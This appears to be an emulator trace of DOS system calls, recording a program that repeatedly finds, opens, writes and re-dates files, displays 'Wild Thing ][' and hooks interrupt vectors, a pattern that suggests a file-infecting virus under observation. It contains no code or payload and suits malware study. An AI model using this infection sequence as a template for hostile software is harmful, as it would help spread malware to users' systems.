2018-12-25T12:44:53.556855892Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:53.564113081Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:53.566533843Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:53.574063473Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.575503668Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:53.578285284Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.581255172Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:53.65099417Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:53.652734817Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:53.662678793Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:53.674543376Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:53.679874321Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:53.687442987Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:53.694584027Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:53.699768096Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:53.701248328Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:53.706895568Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.708171304Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:53.710391441Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.712479283Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:53.722097967Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:53.723705805Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:53.729976872Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:53.736736878Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:53.738785121Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:53.743995856Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:53.751259223Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:53.756464789Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:53.758646354Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:53.764157655Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.765411129Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:53.767731372Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.769419356Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:53.775438043Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:53.776860594Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:53.784138063Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:53.790771578Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:53.793523542Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:53.798515418Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:53.807835768Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:53.821260008Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:53.823964191Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:53.831289101Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.833586386Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:53.837723496Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.839691222Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:53.849441879Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:53.852006674Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:53.860518229Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:53.871362371Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:53.875178629Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:53.882259655Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:53.892854447Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:53.90017127Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:53.902391264Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:53.909734308Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.911123348Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:53.914671946Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:53.916591923Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:53.925399417Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:53.927305347Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:53.935621634Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:53.947187759Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:53.951426161Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:53.958351812Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:53.971210545Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:53.980760952Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:53.982739605Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:53.990891082Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:53.993576611Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:54.001843373Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:54.01895772Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:54.022680636Z 59 PC: 12e83 | Change current directory
2018-12-25T12:44:54.027721734Z 59 PC: 12e8d | Change current directory
2018-12-25T12:44:54.030542679Z 26 PC: 12f82 | Set disk transfer address (See above)
2018-12-25T12:44:54.032571484Z 9 PC: 12ea4 | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:44:56.240222639Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:44:56.241975088Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:44:56.244460348Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:44:56.248281329Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:44:56.260423817Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:44:56.2619931Z 62 PC: 91fc1 | Close file
2018-12-25T12:44:56.265137919Z 75 PC: 91fe0 | Execute program
2018-12-25T12:44:56.282957989Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:44:56.284382451Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:44:56.289561636Z 48 PC: c609 | Get DOS version
2018-12-25T12:44:56.293034462Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:44:56.304973534Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:44:56.308404471Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:44:56.312019502Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:44:56.317115089Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:44:56.330915571Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:44:56.343218035Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:44:56.34533884Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:44:56.349134156Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:44:56.380949691Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:44:56.385255744Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:44:56.388083166Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:44:56.38983668Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:44:56.391169075Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:56.393524729Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:56.395125237Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:44:56.40400081Z 62 PC: 8f8eb | Close file
2018-12-25T12:44:56.406894255Z 62 PC: 8f8f2 | Close file
2018-12-25T12:44:56.409705655Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.411771324Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.414583866Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.416952978Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.41897645Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.421216926Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.42414655Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.426192063Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.428271652Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.4312576Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.433321415Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.435375743Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.437908317Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.439606553Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.441284817Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.443924335Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.445597339Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.447251951Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.449886134Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.451539846Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.453874423Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.456427376Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.458173436Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.459751968Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.462244276Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.463715754Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.465351569Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.468818071Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.471729988Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:56.473203301Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:44:56.480150188Z 62 PC: 8f90e | Close file
2018-12-25T12:44:56.483927254Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:44:56.486111455Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:44:56.488719519Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:44:56.494149828Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:44:56.496097257Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:44:56.502221196Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:44:56.504409767Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:44:56.506078192Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:44:56.509340736Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:44:56.51280628Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:44:56.514777289Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:44:56.517288269Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:44:56.519603571Z 73 PC: 8fa11 | Release memory
2018-12-25T12:44:56.521682605Z 73 PC: 8efea | Release memory
2018-12-25T12:44:56.523778575Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:44:56.525599229Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:44:56.52731987Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:44:56.529176331Z 73 PC: 8f060 | Release memory
2018-12-25T12:44:56.531232907Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:44:56.542208118Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:44:56.548988644Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:44:56.551048455Z 62 PC: 8f0d1 | Close file
2018-12-25T12:44:56.553409745Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:44:56.578118922Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:44:56.58037558Z 48 PC: 12bee | Get DOS version
2018-12-25T12:44:56.582167593Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:44:56.585025151Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:44:56.587003459Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:44:56.588296692Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:44:56.590396808Z 72 PC: 1355d | Allocate memory
2018-12-25T12:44:56.592331563Z 25 PC: 13596 | Get default drive
2018-12-25T12:44:56.593441535Z 71 PC: 135ad | Get current directory
2018-12-25T12:44:56.596136138Z 59 PC: 135ba | Change current directory
2018-12-25T12:44:56.603339817Z 59 PC: 135c8 | Change current directory
2018-12-25T12:44:56.610058702Z 59 PC: 135d3 | Change current directory
2018-12-25T12:44:56.614156231Z 25 PC: 12d13 | Get default drive
2018-12-25T12:44:56.617112328Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:44:56.618526519Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:44:56.619838601Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:44:56.623378802Z 80 PC: 1301d | Set current PSP
2018-12-25T12:44:56.624768587Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:44:56.626467793Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:56.629359888Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:56.631203167Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:44:56.633499587Z 72 PC: 130ec | Allocate memory
2018-12-25T12:44:56.637043604Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:44:56.643875429Z 62 PC: 131ba | Close file
2018-12-25T12:44:56.646446006Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:44:56.649581009Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:44:56.651643503Z 72 PC: 11991 | Allocate memory
2018-12-25T12:44:56.653794376Z 73 PC: 119b2 | Release memory
2018-12-25T12:44:56.656501765Z 72 PC: 119bd | Allocate memory
2018-12-25T12:44:56.658661294Z 73 PC: 119df | Release memory
2018-12-25T12:44:56.660193168Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:44:56.663079596Z 72 PC: 119fd | Allocate memory